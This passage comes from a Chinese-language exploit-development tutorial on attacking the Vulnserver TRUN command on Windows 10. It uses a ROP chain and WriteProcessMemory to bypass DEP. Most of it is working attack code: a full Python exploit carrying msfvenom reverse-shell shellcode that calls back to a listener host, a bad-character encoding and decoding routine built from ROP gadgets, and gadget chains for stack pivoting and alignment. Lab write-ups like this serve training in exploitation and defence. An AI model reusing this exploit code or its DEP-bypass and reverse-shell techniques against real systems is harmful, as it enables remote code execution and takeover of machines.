+= struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN</span></span><br></pre></td></tr></table></figure>
<p>完整的利用代码如下。注意:脚本中的 Gadget 地址在系统重启后会失效,因为大部分 Gadget 取自开启了<code>ASLR</code>的系统<code>DLL</code>(<code>kernel32</code>、<code>kernelbase</code>、<code>ntdll</code>、<code>ws2_32</code>等),它们的基址每次启动都会变化;而<code>ESSFUNC.DLL</code>本身不具备构造完整<code>ROP Chain</code>所需的全部 Gadget,无法完全避开这些带<code>ASLR</code>的 DLL,所以重启后需要重新收集这些地址。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span 
class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string">Vulnserver TRUN exploit (ROP, DEP bypass).</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Vulnerable Software: Vulnserver</span></span><br><span class="line"><span class="string">Version: 1.00</span></span><br><span class="line"><span class="string">Exploit Author: Andres Roldan</span></span><br><span class="line"><span class="string">Tested On: Windows 10 20H2</span></span><br><span class="line"><span class="string">Writeup: https://fluidattacks.com/blog/vulnserver-trun-rop/</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">HOST = <span class="string">'192.168.91.142'</span></span><br><span class="line">PORT = <span class="number">9999</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00'</span></span><br><span class="line">shellcode = <span class="string">b""</span></span><br><span class="line">shellcode += <span 
class="string">b"\xbd\x77\x28\x83\xaa\xdb\xd9\xd9\x74\x24\xf4"</span></span><br><span class="line">shellcode += <span class="string">b"\x58\x31\xc9\xb1\x52\x31\x68\x12\x03\x68\x12"</span></span><br><span class="line">shellcode += <span class="string">b"\x83\x9f\xd4\x61\x5f\xa3\xcd\xe4\xa0\x5b\x0e"</span></span><br><span class="line">shellcode += <span class="string">b"\x89\x29\xbe\x3f\x89\x4e\xcb\x10\x39\x04\x99"</span></span><br><span class="line">shellcode += <span class="string">b"\x9c\xb2\x48\x09\x16\xb6\x44\x3e\x9f\x7d\xb3"</span></span><br><span class="line">shellcode += <span class="string">b"\x71\x20\x2d\x87\x10\xa2\x2c\xd4\xf2\x9b\xfe"</span></span><br><span class="line">shellcode += <span class="string">b"\x29\xf3\xdc\xe3\xc0\xa1\xb5\x68\x76\x55\xb1"</span></span><br><span class="line">shellcode += <span class="string">b"\x25\x4b\xde\x89\xa8\xcb\x03\x59\xca\xfa\x92"</span></span><br><span class="line">shellcode += <span class="string">b"\xd1\x95\xdc\x15\x35\xae\x54\x0d\x5a\x8b\x2f"</span></span><br><span class="line">shellcode += <span class="string">b"\xa6\xa8\x67\xae\x6e\xe1\x88\x1d\x4f\xcd\x7a"</span></span><br><span class="line">shellcode += <span class="string">b"\x5f\x88\xea\x64\x2a\xe0\x08\x18\x2d\x37\x72"</span></span><br><span class="line">shellcode += <span class="string">b"\xc6\xb8\xa3\xd4\x8d\x1b\x0f\xe4\x42\xfd\xc4"</span></span><br><span class="line">shellcode += <span class="string">b"\xea\x2f\x89\x82\xee\xae\x5e\xb9\x0b\x3a\x61"</span></span><br><span class="line">shellcode += <span class="string">b"\x6d\x9a\x78\x46\xa9\xc6\xdb\xe7\xe8\xa2\x8a"</span></span><br><span class="line">shellcode += <span class="string">b"\x18\xea\x0c\x72\xbd\x61\xa0\x67\xcc\x28\xad"</span></span><br><span class="line">shellcode += <span class="string">b"\x44\xfd\xd2\x2d\xc3\x76\xa1\x1f\x4c\x2d\x2d"</span></span><br><span class="line">shellcode += <span class="string">b"\x2c\x05\xeb\xaa\x53\x3c\x4b\x24\xaa\xbf\xac"</span></span><br><span class="line">shellcode += 
<span class="string">b"\x6d\x69\xeb\xfc\x05\x58\x94\x96\xd5\x65\x41"</span></span><br><span class="line">shellcode += <span class="string">b"\x38\x85\xc9\x3a\xf9\x75\xaa\xea\x91\x9f\x25"</span></span><br><span class="line">shellcode += <span class="string">b"\xd4\x82\xa0\xef\x7d\x28\x5b\x78\x42\x05\x6e"</span></span><br><span class="line">shellcode += <span class="string">b"\xf1\x2a\x54\x70\x10\xf7\xd1\x96\x78\x17\xb4"</span></span><br><span class="line">shellcode += <span class="string">b"\x01\x15\x8e\x9d\xd9\x84\x4f\x08\xa4\x87\xc4"</span></span><br><span class="line">shellcode += <span class="string">b"\xbf\x59\x49\x2d\xb5\x49\x3e\xdd\x80\x33\xe9"</span></span><br><span class="line">shellcode += <span class="string">b"\xe2\x3e\x5b\x75\x70\xa5\x9b\xf0\x69\x72\xcc"</span></span><br><span class="line">shellcode += <span class="string">b"\x55\x5f\x8b\x98\x4b\xc6\x25\xbe\x91\x9e\x0e"</span></span><br><span class="line">shellcode += <span class="string">b"\x7a\x4e\x63\x90\x83\x03\xdf\xb6\x93\xdd\xe0"</span></span><br><span class="line">shellcode += <span class="string">b"\xf2\xc7\xb1\xb6\xac\xb1\x77\x61\x1f\x6b\x2e"</span></span><br><span class="line">shellcode += <span class="string">b"\xde\xc9\xfb\xb7\x2c\xca\x7d\xb8\x78\xbc\x61"</span></span><br><span class="line">shellcode += <span class="string">b"\x09\xd5\xf9\x9e\xa6\xb1\x0d\xe7\xda\x21\xf1"</span></span><br><span class="line">shellcode += <span class="string">b"\x32\x5f\x41\x10\x96\xaa\xea\x8d\x73\x17\x77"</span></span><br><span class="line">shellcode += <span class="string">b"\x2e\xae\x54\x8e\xad\x5a\x25\x75\xad\x2f\x20"</span></span><br><span class="line">shellcode += <span class="string">b"\x31\x69\xdc\x58\x2a\x1c\xe2\xcf\x4b\x35"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">func = struct.pack(<span class="string">"<L"</span>,<span class="number">0x45454545</span>) <span class="comment"># WriteProcessMemory Address</span></span><br><span class="line">func += 
struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Shellcode Return Address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0xFFFFFFFF</span>) <span class="comment"># pseudo Process handle</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Code cave address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy lpBuffer (Stack address) </span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy nSize</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62502028</span>) <span class="comment"># lpNumberOfBytesWritten</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">eip = struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501022</span>) <span class="comment"># retn essfunc.dll</span></span><br><span class="line"></span><br><span class="line">rop1 = struct.pack(<span class="string">"<L"</span>, <span class="number">0x755912d6</span>) <span class="comment"># PUSH ESP # POP ESI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x755b671f</span>) <span class="comment"># MOV EDX,ESI # POP ESI # RETN 0x04 </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7728bdf4</span>) <span class="comment"># MOV EAX,EDX # POP ESI # RETN </span></span><br><span 
class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x88888888</span>) <span class="comment"># 0x88888888</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x77777878</span>) <span class="comment"># 0x77777878</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758fe636</span>) <span class="comment"># MOV EAX,EDX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) 
<span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a5a6f</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffffdf4</span>) <span class="comment"># 0xfffffdf4</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758f15ce</span>) <span class="comment"># NEG EAX # RETN</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span 
class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x76068122</span>) <span class="comment"># XCHG EAX,EDI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x62506090</span>) <span class="comment"># IAT 62506090 AddAtomA KERNEL32 </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75fd7518</span>) <span class="comment"># XCHG EAX,DWORD PTR [ECX] # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7557771b</span>) <span class="comment"># POP EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffd9df0</span>) <span 
class="comment"># 0xfffd9df0</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758f15ce</span>) <span class="comment"># NEG EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x76068122</span>) <span class="comment"># XCHG EAX,EDI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f2002</span>) <span class="comment"># XCHG EAX,ESP # RETN </span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">padding = <span class="string">b"C"</span> * (<span class="number">3000</span><span class="number">-2006</span><span class="number">-32</span>-len(rop1)-len(shellcode))</span><br><span class="line"></span><br><span class="line">PAYLOAD = (</span><br><span class="line"> <span class="string">b'TRUN .'</span> +</span><br><span class="line"> <span class="string">b'A'</span> * (<span class="number">2006</span>-len(func)) +</span><br><span class="line"> func +</span><br><span class="line"> eip +</span><br><span class="line"> rop1 + </span><br><span class="line"> <span class="string">b"\x90"</span>*<span class="number">128</span>+</span><br><span class="line"> shellcode+</span><br><span class="line"> padding</span><br><span 
class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> socket.create_connection((HOST, PORT)) <span class="keyword">as</span> fd:</span><br><span class="line"> fd.sendall(PAYLOAD)</span><br></pre></td></tr></table></figure>
<p>执行,出现问题了:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/14.png" alt="BOF"></p>
<p>原因是<code>msfvenom</code>生成的编码 shellcode 自带解码存根,解码存根会在运行时原地改写(解码)自身,因此要求 shellcode 所在内存可写;而这里 shellcode 被<code>WriteProcessMemory</code>复制到了<code>essfunc.dll</code>的代码段(code cave),这块内存并不可写。<code>msfvenom</code>的编码器在这里因此无法使用,只能采用其他办法:要么自己写不包含坏字符的<code>shellcode</code>;要么把坏字符替换成其他字节,并在代码被复制到代码段之前,用额外的<code>ROP Gadgets</code>恢复这些坏字符。</p>
<p><strong>自定义shellcode</strong>:这里需要注意的是坏字符的处理,可以将产生坏字符的指令替换成等价的其他指令(例如换一种方式给寄存器赋值),有点类似之前生成<code>egghunter</code>时遇到<code>00</code>字符后改写指令的方法。这里利用外国友人的<a href="https://github.com/epi052/osed-scripts/blob/main/shellcoder.py" target="_blank" rel="noopener">脚本</a>来生成<code>shellcode</code>:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/15.png" alt="BOF"></p>
<p>注意脚本对坏字符的检测结果:检测到坏字符后,脚本不会替你修复,需要自己定位到产生该字节的指令处手动修改;多个坏字符用空格分隔传入。</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/16.png" alt="BOF"></p>
<p>将利用脚本里面的<code>shellcode</code>部分替换成这里生成的<code>shellcode</code>,再次执行,喜闻乐见的反弹<code>shell</code>出现了:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/17.png" alt="BOF"></p>
<p><strong>编码和解码shellcode:</strong>这种方法稍微复杂一点,需要增加一些解码用的<code>ROP Gadget</code>。构建<code>ROP Chain</code>时,每多一个坏字符就要多一组解码 Gadget,所需栈空间也随之增长,如果坏字符较多,需要预留的栈空间就会更大。编码和解码部分的代码如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">mapBadChars</span><span class="params">(sh)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> i = <span class="number">0</span></span><br><span class="line"> badIndex = []</span><br><span class="line"> <span class="keyword">while</span> i < len(sh):</span><br><span class="line"> <span class="keyword">for</span> c <span 
class="keyword">in</span> BADCHARS:</span><br><span class="line"> <span class="keyword">if</span> sh[i] == c:</span><br><span class="line"> badIndex.append(i)</span><br><span class="line"> i=i+<span class="number">1</span></span><br><span class="line"> <span class="keyword">return</span> badIndex</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encodeShellcode</span><span class="params">(sh)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> REPLACECHARS = <span class="string">b"\xff"</span></span><br><span class="line"> encodedShell = sh</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(BADCHARS)):</span><br><span class="line"> encodedShell = encodedShell.replace(struct.pack(<span class="string">"B"</span>, BADCHARS[i]), struct.pack(<span class="string">"B"</span>, REPLACECHARS[i]))</span><br><span class="line"> <span class="keyword">return</span> encodedShell</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decodeShellcode</span><span class="params">(dllBase, badIndex, shellcode)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> CHARSTOADD = <span class="string">b"\x01"</span></span><br><span class="line"> restoreRop = <span class="string">b""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(badIndex)):</span><br><span class="line"> <span class="keyword">if</span> i == <span class="number">0</span>:</span><br><span class="line"> offset = badIndex[i]</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> offset = badIndex[i] - badIndex[i<span class="number">-1</span>]</span><br><span 
class="line"> neg_offset = (-offset) & <span class="number">0xffffffff</span></span><br><span class="line"> value = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(len(BADCHARS)):</span><br><span class="line"> <span class="keyword">if</span> shellcode[badIndex[i]] == BADCHARS[j]:</span><br><span class="line"> value = CHARSTOADD[j]</span><br><span class="line"> value = (value) | <span class="number">0x11111100</span> <span class="comment"># DL</span></span><br><span class="line"> print(hex(value))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x7637768e</span>)) <span class="comment"># POP ECX # RETN ** [WS2_32.DLL] **</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (neg_offset))</span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x758ba9a8</span>)) <span class="comment"># SUB EAX,ECX # RETN ** [KERNEL32.DLL] ** </span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (<span class="number">0x7721aed0</span>)) <span class="comment"># POP EDX # RETN ** [ntdll.dll] **</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (value)) <span class="comment"># values in DL</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x755bc4eb</span>)) <span class="comment"># ADD BYTE PTR [EAX],DL # RETN ** [KERNELBASE.dll] ** </span></span><br><span class="line"> <span class="keyword">return</span> restoreRop</span><br></pre></td></tr></table></figure>
<p>这个算法的思路是:<code>mapBadChars</code>先把 shellcode 中每个坏字符的下标保存到列表;<code>encodeShellcode</code>把坏字符<code>0x00</code>替换成<code>0xff</code>;<code>decodeShellcode</code>则为每个坏字符生成一组 Gadget,让 EAX 从 shellcode 起始位置向后移动到该坏字符处,再对该字节做一次加法恢复,因为单字节加法会溢出回绕,<code>0xff + 0x01 = 0x00</code>。注意这里的偏移量是相邻两个坏字符之间的距离,并且以取负后的值配合<code>SUB EAX,ECX</code>使用,等价于<code>ADD EAX,offset</code>(推测是为了避免小的正偏移量本身带来<code>00</code>字节);因此解码前必须先让 EAX 指向 shellcode 的起始位置。我这里是从<code>shellcode</code>的开始位置往后遍历,也有实现是从开始位置之前往后遍历,主要看能否正确遍历到每一个坏字符,具体哪种视情况而定。还有上述<code>value=(value)|0x11111100</code>:这里的<code>ROP Gadget</code>只使用<code>DL</code>(EDX 的最低字节),把高 24 位填成<code>0x111111</code>是为了保证<code>POP EDX</code>弹出的立即数中其他字节不会出现<code>00</code>。另外也不局限于<code>DL</code>,<code>AL、AH、BL、BH</code>等都可以,关键在于能找到对应的<code>ADD BYTE PTR [reg],r8</code>形式的 Gadget。代码中残留的<code>print(hex(value))</code>只是调试输出,可以删掉。</p>
<p>考虑到<code>ROP Gadgets</code>会比较长,这里有个小技巧,用于开辟一块比较大的栈空间存储<code>ROP Gadgets</code>:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Patching dummy lpBuffer</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x88888888</span>) <span class="comment"># 0x88888888</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x77777988</span>) <span class="comment"># 0x77777988</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758fe636</span>) <span class="comment"># MOV EAX,EDX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, 
<span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN</span></span><br></pre></td></tr></table></figure>
<p>这里使用<code>0x88888888+0x77777988=0000000100000210</code>(超出 32 位的高 8 位十六进制被截断,所以实际得到的是<code>0x210</code>;直接写<code>0x210</code>会带入<code>\x00</code>坏字符,因此拆成两个不含坏字符的值相加)。这个<code>0x210</code>就是保存的<code>ESP</code>到<code>shellcode</code>的偏移,也就是 ROP 链占用的栈空间,需要多大可以大致评估出来:先确定有多少坏字符,每个坏字符需要多少字节的<code>ROP Gadgets</code>来处理,加上处理<code>WriteProcessMemory</code>三个参数的<code>ROP Gadgets</code>,再加上对齐<code>shellcode</code>的<code>ROP Gadgets</code>和把<code>ESP</code>切换到执行流的<code>ROP Gadgets</code>。</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/18.png" alt="BOF"></p>
<p>可以看到已经指向了<code>\x90</code>区域。</p>
<p>后续需要注意的就是,解码之前需要让<code>EAX</code>正好指向<code>shellcode</code>开始的位置(下面的解码 gadget 以<code>EAX</code>作为写回字节的地址),我这里的 ROP Gadgets 如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Align EAX with shellcode</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a5a6f</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>,<span class="number">0xfffffda8</span>) <span class="comment"># 0n600</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772974e4</span>) <span class="comment"># SUB EAX,ECX # RETN ** [ntdll.dll] **</span></span><br></pre></td></tr></table></figure>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/19.png" alt="BOF"></p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/20.png" alt="BOF"></p>
